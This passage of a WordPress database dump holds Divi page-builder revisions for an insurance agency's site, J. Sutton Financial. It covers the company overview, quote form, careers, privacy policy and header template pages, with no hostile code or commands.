_builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_2,1_2\" custom_margin=\"66px|auto|66px|auto||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" header_2_text_align=\"center\" header_2_text_color=\"#003372\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"29px||0px|||\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" header_2_text_align=\"center\" header_2_text_color=\"#003372\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-02 18:46:45','2023-04-02 18:46:45','',26,'http://cmdev-site1.com/?p=598',0,'revision','',0),(739,1,'2023-04-03 23:56:08','2023-04-03 23:56:08','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"How much insurance do you need?\" color=\"#003372\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.0\" _module_preset=\"default\" custom_margin=\"-50px||||false|false\" custom_padding=\"10px||||false|false\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<p>[gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"]</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Insurance Quote','','inherit','closed','closed','','225-revision-v1','','','2023-04-03 23:56:08','2023-04-03 23:56:08','',225,'http://cmdev-site1.com/?p=739',0,'revision','',0),(604,1,'2023-04-02 18:53:00','2023-04-02 18:53:00','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"66px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_text_divider header=\"How much insurance do you need?\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.0\" _module_preset=\"default\" custom_margin=\"-50px||||false|false\" custom_padding=\"10px||||false|false\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Insurance Quote','','inherit','closed','closed','','225-revision-v1','','','2023-04-02 18:53:00','2023-04-02 18:53:00','',225,'http://cmdev-site1.com/?p=604',0,'revision','',0),(605,1,'2023-04-02 18:53:23','2023-04-02 18:53:23','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"66px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_text_divider header=\"How much insurance do you need?\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\" color=\"#003372\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.0\" _module_preset=\"default\" custom_margin=\"-50px||||false|false\" custom_padding=\"10px||||false|false\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Insurance Quote','','inherit','closed','closed','','225-revision-v1','','','2023-04-02 18:53:23','2023-04-02 18:53:23','',225,'http://cmdev-site1.com/?p=605',0,'revision','',0),(606,1,'2023-04-02 18:53:59','2023-04-02 18:53:59','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"66px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_text_divider header=\"Careers\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\" color=\"#003372\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Products & Services\" color=\"#FFFFFF\" divider_weight=\"5px\" text_gap=\"15px\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" background_layout=\"dark\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-02 18:53:59','2023-04-02 18:53:59','',38,'http://cmdev-site1.com/?p=606',0,'revision','',0),(612,1,'2023-04-02 18:59:06','2023-04-02 18:59:06','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px||-77px|||\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Our Privacy Policy\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" custom_margin=\"-10px|||||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"]<!-- wp:heading -->\r\n<h2>Who we are</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Our website address is: <a href=\"https://www.jsuttonfinancial.com/\" target=\"_blank\" rel=\"noopener\">https://www.jsuttonfinancial.com/</a>.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Comments</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>When visitors leave comments on the site, we collect the data shown in the comments form and the visitor’s IP address and browser user agent string to help spam detection.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Media</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Cookies</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you leave a comment on our site, you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select \"Remember Me,\" your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Embedded content from other websites</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Articles on this site may include embedded content (e.g., videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Who we share your data with</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you request a password reset, your IP address will be included in the reset email.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>How long we retain your data</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>What rights you have over your data</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you have an account on this site or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Where your data is sent</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Visitor comments may be checked through an automated spam detection service.</p>\r\n<!-- /wp:paragraph -->[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Privacy Policy','','inherit','closed','closed','','3-revision-v1','','','2023-04-02 18:59:06','2023-04-02 18:59:06','',3,'http://cmdev-site1.com/?p=612',0,'revision','',0),(603,1,'2023-04-02 18:51:29','2023-04-02 18:51:29','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px||-77px|||\" custom_padding=\"66px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_text_divider header=\"Our Privacy Policy\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\" custom_margin=\"-10px|||||\" custom_padding=\"0px|||||\"][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"]<!-- wp:heading -->\r\n<h2>Who we are</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Our website address is: <a href=\"https://www.jsuttonfinancial.com/\" target=\"_blank\" rel=\"noopener\">https://www.jsuttonfinancial.com/</a>.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Comments</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>When visitors leave comments on the site, we collect the data shown in the comments form and the visitor’s IP address and browser user agent string to help spam detection.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Media</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Cookies</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you leave a comment on our site, you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select \"Remember Me,\" your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Embedded content from other websites</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Articles on this site may include embedded content (e.g., videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Who we share your data with</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you request a password reset, your IP address will be included in the reset email.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>How long we retain your data</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>What rights you have over your data</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you have an account on this site or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Where your data is sent</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Visitor comments may be checked through an automated spam detection service.</p>\r\n<!-- /wp:paragraph -->[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Privacy Policy','','inherit','closed','closed','','3-revision-v1','','','2023-04-02 18:51:29','2023-04-02 18:51:29','',3,'http://cmdev-site1.com/?p=603',0,'revision','',0),(608,1,'2023-04-02 18:55:44','2023-04-02 18:55:44','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-02 18:55:44','2023-04-02 18:55:44','',528,'http://cmdev-site1.com/?p=608',0,'revision','',0),(610,1,'2023-04-02 18:56:52','2023-04-02 18:56:52','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" 